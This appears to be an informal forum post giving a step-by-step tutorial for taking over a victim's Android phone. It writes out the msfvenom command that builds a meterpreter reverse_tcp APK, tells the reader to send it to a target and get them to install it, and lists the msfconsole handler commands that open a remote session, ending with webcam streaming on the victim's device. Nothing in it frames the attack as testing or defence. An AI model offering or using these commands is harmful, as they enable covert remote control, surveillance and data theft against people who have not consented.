hi here is latest trick to hack android


you can access victim android system

access all func



here is :


open your kali2



type
#msfvenom -p android/meterpreter/reverse_tcp LHOST=[your publice ip or private ip] LPORT=8888 R > /root/Desktop/yourapkfile.apk



here apk are create which save at Desktop


uplad ur apk and send it to target



thn

open terminal type msfconsole

#msfconsole
#use multi/handler/
#set PAYLOAD android/meterpreter/reverse_tcp
#show options


you need create LHOST and LPORT

open new terminal for find LHOST it is your ip

#ifconfig

now you get ip put it in LHOST

at msfconsole

# set LHOST ip
#set LPORT 8888


#exploit


now done

but 1stly ur android.apk should send to victim and he should install on his device

...


after it you will get meterpreter console



#sessions -i 1

check session active or not

or type help


#help


is show list chose any and attack on your victim 




enjoy




same comands:



#webcam_stream




here 

im prince villu